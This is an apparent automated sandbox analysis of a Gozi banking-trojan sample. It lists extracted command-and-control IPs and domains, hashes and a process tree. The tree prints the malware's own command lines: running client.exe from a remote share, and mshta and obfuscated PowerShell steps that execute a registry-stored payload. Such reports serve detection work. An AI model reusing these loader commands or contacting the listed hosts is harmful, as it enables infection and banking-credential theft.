gozi | 8bb04ebea49b92e090b777efedfa44c8aa881a5531a0791f7f2404d0d50f9963

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
04-10-2023 18:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8bb04ebea49b92e090b777efedfa44c8aa881a5531a0791f7f2404d0d50f9963_JC.url
Size

192B
MD5

52aa02b4f67f2f504fcb991e6d094e58
SHA1

87e772a1597eba6b20bb750fd79c9ac30738229a
SHA256

8bb04ebea49b92e090b777efedfa44c8aa881a5531a0791f7f2404d0d50f9963
SHA512

e5baa8bbce30f1ca6c64705b9145454857c02f2a27308fc27b07c145517cbd3ccbde2cb57f94459df9fe4311a82cb3607f097a6219286f1d9eca44b953d54be4

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

185.247.184.139

62.72.33.155

incontroler.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

mifrutty.com

systemcheck.top

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

rundll32.exemshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation	rundll32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation	mshta.exe

Suspicious use of SetThreadContext 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 2956 set thread context of 3180	2956	powershell.exe	Explorer.EXE
PID 3180 set thread context of 3736	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 set thread context of 4060	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 set thread context of 4824	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 set thread context of 4780	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 set thread context of 3384	3180	Explorer.EXE	cmd.exe
PID 3384 set thread context of 556	3384	cmd.exe	PING.EXE
PID 3180 set thread context of 3744	3180	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4700 1564 WerFault.exe client.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

556 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

556 PING.EXE

pid	pid_target	process	target process
4700	1564	WerFault.exe	client.exe

pid	process
556	PING.EXE

pid	process
556	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

client.exepowershell.exeExplorer.EXE

pid	process
1564	client.exe
1564	client.exe
2956	powershell.exe
2956	powershell.exe
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE

Suspicious behavior: MapViewOfSection 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

2956 powershell.exe
3180 Explorer.EXE
3180 Explorer.EXE
3180 Explorer.EXE
3180 Explorer.EXE
3180 Explorer.EXE
3384 cmd.exe
3180 Explorer.EXE

pid	process
2956	powershell.exe
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3384	cmd.exe
3180	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

powershell.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	2956	powershell.exe
Token: SeShutdownPrivilege	3180	Explorer.EXE
Token: SeCreatePagefilePrivilege	3180	Explorer.EXE
Token: SeShutdownPrivilege	3180	Explorer.EXE
Token: SeCreatePagefilePrivilege	3180	Explorer.EXE
Token: SeShutdownPrivilege	3180	Explorer.EXE
Token: SeCreatePagefilePrivilege	3180	Explorer.EXE
Token: SeShutdownPrivilege	3180	Explorer.EXE
Token: SeCreatePagefilePrivilege	3180	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

3180 Explorer.EXE

pid	process
3180	Explorer.EXE

Suspicious use of WriteProcessMemory 49 IoCs

Processes:

rundll32.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 3276 wrote to memory of 1564	3276	rundll32.exe	client.exe
PID 3276 wrote to memory of 1564	3276	rundll32.exe	client.exe
PID 3276 wrote to memory of 1564	3276	rundll32.exe	client.exe
PID 1304 wrote to memory of 2956	1304	mshta.exe	powershell.exe
PID 1304 wrote to memory of 2956	1304	mshta.exe	powershell.exe
PID 2956 wrote to memory of 4252	2956	powershell.exe	csc.exe
PID 2956 wrote to memory of 4252	2956	powershell.exe	csc.exe
PID 4252 wrote to memory of 3036	4252	csc.exe	cvtres.exe
PID 4252 wrote to memory of 3036	4252	csc.exe	cvtres.exe
PID 2956 wrote to memory of 4620	2956	powershell.exe	csc.exe
PID 2956 wrote to memory of 4620	2956	powershell.exe	csc.exe
PID 4620 wrote to memory of 3864	4620	csc.exe	cvtres.exe
PID 4620 wrote to memory of 3864	4620	csc.exe	cvtres.exe
PID 2956 wrote to memory of 3180	2956	powershell.exe	Explorer.EXE
PID 2956 wrote to memory of 3180	2956	powershell.exe	Explorer.EXE
PID 2956 wrote to memory of 3180	2956	powershell.exe	Explorer.EXE
PID 2956 wrote to memory of 3180	2956	powershell.exe	Explorer.EXE
PID 3180 wrote to memory of 3736	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 wrote to memory of 3736	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 wrote to memory of 3736	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 wrote to memory of 3736	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 wrote to memory of 4060	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 wrote to memory of 4060	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 wrote to memory of 4060	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 wrote to memory of 4060	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 wrote to memory of 4824	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 wrote to memory of 4824	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 wrote to memory of 4824	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 wrote to memory of 4824	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 wrote to memory of 4780	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 wrote to memory of 4780	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 wrote to memory of 4780	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 wrote to memory of 4780	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 wrote to memory of 3384	3180	Explorer.EXE	cmd.exe
PID 3180 wrote to memory of 3384	3180	Explorer.EXE	cmd.exe
PID 3180 wrote to memory of 3384	3180	Explorer.EXE	cmd.exe
PID 3180 wrote to memory of 3384	3180	Explorer.EXE	cmd.exe
PID 3180 wrote to memory of 3384	3180	Explorer.EXE	cmd.exe
PID 3180 wrote to memory of 3744	3180	Explorer.EXE	cmd.exe
PID 3180 wrote to memory of 3744	3180	Explorer.EXE	cmd.exe
PID 3180 wrote to memory of 3744	3180	Explorer.EXE	cmd.exe
PID 3180 wrote to memory of 3744	3180	Explorer.EXE	cmd.exe
PID 3384 wrote to memory of 556	3384	cmd.exe	PING.EXE
PID 3384 wrote to memory of 556	3384	cmd.exe	PING.EXE
PID 3384 wrote to memory of 556	3384	cmd.exe	PING.EXE
PID 3384 wrote to memory of 556	3384	cmd.exe	PING.EXE
PID 3384 wrote to memory of 556	3384	cmd.exe	PING.EXE
PID 3180 wrote to memory of 3744	3180	Explorer.EXE	cmd.exe
PID 3180 wrote to memory of 3744	3180	Explorer.EXE	cmd.exe

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4824

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4060

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3736

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3180

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\8bb04ebea49b92e090b777efedfa44c8aa881a5531a0791f7f2404d0d50f9963_JC.url
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3276

\??\UNC\62.173.146.42\scarica\client.exe
"\\62.173.146.42\scarica\client.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 1380
4⤵
- Program crash
PID:4700

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Pcwj='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Pcwj).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\DD164BDA-982A-17AD-8A61-4C3B5E25409F\\\FolderOptions'));if(!window.flag)close()</script>"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1304

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jbgduypxw -value gp; new-alias -name xgstdrg -value iex; xgstdrg ([System.Text.Encoding]::ASCII.GetString((jbgduypxw "HKCU:Software\AppDataLow\Software\Microsoft\DD164BDA-982A-17AD-8A61-4C3B5E25409F").MelodyTool))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2956

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f1t0q5d1\f1t0q5d1.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:4252

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD8A3.tmp" "c:\Users\Admin\AppData\Local\Temp\f1t0q5d1\CSC8403FFD5A334832B23E2973BD499B4.TMP"
5⤵
PID:3036

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\px4cvxhz\px4cvxhz.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:4620

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDA0A.tmp" "c:\Users\Admin\AppData\Local\Temp\px4cvxhz\CSC51166AE1DE15412AB7ACD223E42F3BFE.TMP"
5⤵
PID:3864

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "\\62.173.146.42\scarica\client.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3384

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:556

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:3744

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1564 -ip 1564
1⤵
PID:1960

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESD8A3.tmp
Filesize
1KB

MD5
21a5a319b05bff065419dccdb7410dc8

SHA1
268f2aaba7b9b3f34a3a791eb794da9f76f3425a

SHA256
4cb8e2a433ff0cc84c66e5797d78d9327a7dccb79545380945f03d4ff96682f0

SHA512
0170b99cf18ca9140b950012f547a5d2fca4ed512b868c5d292770a8aba2c3b1eb1d08ec4c6f6bf9c37ed43c928c93f14fa9a0bf9c1bf09c989f98ab6b772f70

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESDA0A.tmp
Filesize
1KB

MD5
de85f372a2a5fd018b6a276a9b097e35

SHA1
8aa987549ccc4cd273d6881f0a24c6d3d8186237

SHA256
bec6062c6a4e25dfb55a8336f630556fe86c0bccc6e305579ea94383d9fec79a

SHA512
9f91e6aa93ddf2d87d034c309caa0e60ca0f3c4b2d16fa252ceb3b3c9061159c302dd868cc298961ab646c9921f126bcdcae5a9ba73e2c14e90197927e292b52

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vdjqnjkg.x2d.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\f1t0q5d1\f1t0q5d1.dll
Filesize
3KB

MD5
983114a2d9791743e3d6c5fc9468564c

SHA1
2c26bd07c0a07c5d71f563a454c2d938525499df

SHA256
4532d99eefadfebf1556e913781c0f941a207e73b695680002477821122ef349

SHA512
3ded0d7c3513eb66ff7385de73aa625391d2fac96b9720b74751e51242f132594df1d6d7a9dbadbe5bd463b43cee1c5a79d8c354c1ce793dee14b3026a2080f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\px4cvxhz\px4cvxhz.dll
Filesize
3KB

MD5
aa0092920a6cc23966faac1d7c130d40

SHA1
3e4918382de5967b10feb9399b2c7b594fcb72da

SHA256
ad2824975ca841930ca0b33cc790856bdea368d7d5f78e5b8ea932864d407029

SHA512
36419bfb677b1ead9504d7e884ec0e5318717c24a2adb9f13982f305cef068f5612fb7f4ebb510a9a7c5970879de05693978497e549318feda88ce0d1143f3a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\f1t0q5d1\CSC8403FFD5A334832B23E2973BD499B4.TMP
Filesize
652B

MD5
c45f70090b3b2694c27ac69a018f9878

SHA1
7c77e783ba4a2ad6fc24bf294e4b27acac24444e

SHA256
f9a3364693e431e941de88761eebbadcab13a0f58cabbed85677c4d8ad99deca

SHA512
40a0a188abf90bec7e973ded9c2a981b7ecff49f6a0ece387e18da101747564a9aaf58b2aebe6d88205d5d8bd923b66f0cb847b68030a4cb420a220e050265a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\f1t0q5d1\f1t0q5d1.0.cs
Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\f1t0q5d1\f1t0q5d1.cmdline
Filesize
369B

MD5
acccfd918873fa820d9826c3f203b64f

SHA1
8391540144bcbee3c67701c2a1b0b5e9a8bbb520

SHA256
912c2952218669acbef4481f5aa412aa5708b5fea4ad329250940548a918977c

SHA512
cc70143655be0b43bb1948da021312adfaa113eabaf173bddc242bb5ee60505ab85bb64e719b4fc5643439a6b0be8c6ddfdbaed142684002c625146e94a13976

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\px4cvxhz\CSC51166AE1DE15412AB7ACD223E42F3BFE.TMP
Filesize
652B

MD5
c3b1c3435156828bf530b933e18efaa0

SHA1
3be91e942539f0422440c09b973c482c33a59593

SHA256
2817b5c59faefa42e4fd4bddd8cfa2a00a960168ac1b73739ea9d5c4eef515a0

SHA512
c32ec2de3c1a7d3a0784d14d23cf6365ab54883f676dae869c870062da401d4cc628fb29e4ab7877d2ce8d4c06e12edab3f67cbba5f2d91860454659f87aa669

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\px4cvxhz\px4cvxhz.0.cs
Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\px4cvxhz\px4cvxhz.cmdline
Filesize
369B

MD5
d0ceaba34b3ee5dea6f04f599b981d5e

SHA1
94f0de7954a936e3de8d73d285c48615216f2be3

SHA256
50e6d4dc7937a0144563dde8f68efa2323153092ede3afcdbc9c0d48dab37dde

SHA512
f71cacff8647b1a22dd9455a8686094dd09831e327ca19aeffd9ada04d4220f1fe82444b805b75dcfbcbf73ea536ae5f7d919fd4fe5c9346379534aea88fb31d

Download Submit
memory/556-113-0x000001E6C1290000-0x000001E6C1334000-memory.dmp

Filesize
656KB

Download
memory/556-127-0x000001E6C1290000-0x000001E6C1334000-memory.dmp

Filesize
656KB

Download
memory/556-114-0x000001E6C1350000-0x000001E6C1351000-memory.dmp

Filesize
4KB

Download
memory/1564-8-0x0000000002530000-0x0000000002630000-memory.dmp

Filesize
1024KB

Download
memory/1564-125-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/1564-9-0x00000000024F0000-0x00000000024FB000-memory.dmp

Filesize
44KB

Download
memory/1564-1-0x0000000002530000-0x0000000002630000-memory.dmp

Filesize
1024KB

Download
memory/1564-7-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/1564-4-0x0000000002510000-0x000000000251D000-memory.dmp

Filesize
52KB

Download
memory/1564-3-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/1564-2-0x00000000024F0000-0x00000000024FB000-memory.dmp

Filesize
44KB

Download
memory/2956-26-0x000002986F170000-0x000002986F192000-memory.dmp

Filesize
136KB

Download
memory/2956-61-0x000002986F320000-0x000002986F328000-memory.dmp

Filesize
32KB

Download
memory/2956-63-0x000002986F330000-0x000002986F36D000-memory.dmp

Filesize
244KB

Download
memory/2956-47-0x000002986F300000-0x000002986F308000-memory.dmp

Filesize
32KB

Download
memory/2956-33-0x000002986F120000-0x000002986F130000-memory.dmp

Filesize
64KB

Download
memory/2956-70-0x00007FFE38090000-0x00007FFE38B51000-memory.dmp

Filesize
10.8MB

Download
memory/2956-77-0x00007FFE38090000-0x00007FFE38B51000-memory.dmp

Filesize
10.8MB

Download
memory/2956-78-0x000002986F330000-0x000002986F36D000-memory.dmp

Filesize
244KB

Download
memory/2956-32-0x000002986F120000-0x000002986F130000-memory.dmp

Filesize
64KB

Download
memory/2956-31-0x00007FFE38090000-0x00007FFE38B51000-memory.dmp

Filesize
10.8MB

Download
memory/3180-65-0x00000000082E0000-0x0000000008384000-memory.dmp

Filesize
656KB

Download
memory/3180-103-0x00000000082E0000-0x0000000008384000-memory.dmp

Filesize
656KB

Download
memory/3180-66-0x0000000000B90000-0x0000000000B91000-memory.dmp

Filesize
4KB

Download
memory/3384-128-0x000001DF90570000-0x000001DF90614000-memory.dmp

Filesize
656KB

Download
memory/3384-107-0x000001DF90550000-0x000001DF90551000-memory.dmp

Filesize
4KB

Download
memory/3384-106-0x000001DF90570000-0x000001DF90614000-memory.dmp

Filesize
656KB

Download
memory/3736-80-0x000001E22AF40000-0x000001E22AFE4000-memory.dmp

Filesize
656KB

Download
memory/3736-81-0x000001E22AA50000-0x000001E22AA51000-memory.dmp

Filesize
4KB

Download
memory/3736-109-0x000001E22AF40000-0x000001E22AFE4000-memory.dmp

Filesize
656KB

Download
memory/3744-116-0x00000000015A0000-0x0000000001638000-memory.dmp

Filesize
608KB

Download
memory/3744-123-0x00000000015A0000-0x0000000001638000-memory.dmp

Filesize
608KB

Download
memory/3744-120-0x00000000012E0000-0x00000000012E1000-memory.dmp

Filesize
4KB

Download
memory/4060-118-0x00000157AC8A0000-0x00000157AC944000-memory.dmp

Filesize
656KB

Download
memory/4060-86-0x00000157AC8A0000-0x00000157AC944000-memory.dmp

Filesize
656KB

Download
memory/4060-87-0x00000157AC860000-0x00000157AC861000-memory.dmp

Filesize
4KB

Download
memory/4780-99-0x000001E4ADBE0000-0x000001E4ADBE1000-memory.dmp

Filesize
4KB

Download
memory/4780-98-0x000001E4AE750000-0x000001E4AE7F4000-memory.dmp

Filesize
656KB

Download
memory/4780-126-0x000001E4AE750000-0x000001E4AE7F4000-memory.dmp

Filesize
656KB

Download
memory/4824-124-0x0000020756640000-0x00000207566E4000-memory.dmp

Filesize
656KB

Download
memory/4824-92-0x0000020755DE0000-0x0000020755DE1000-memory.dmp

Filesize
4KB

Download
memory/4824-90-0x0000020756640000-0x00000207566E4000-memory.dmp

Filesize
656KB

Download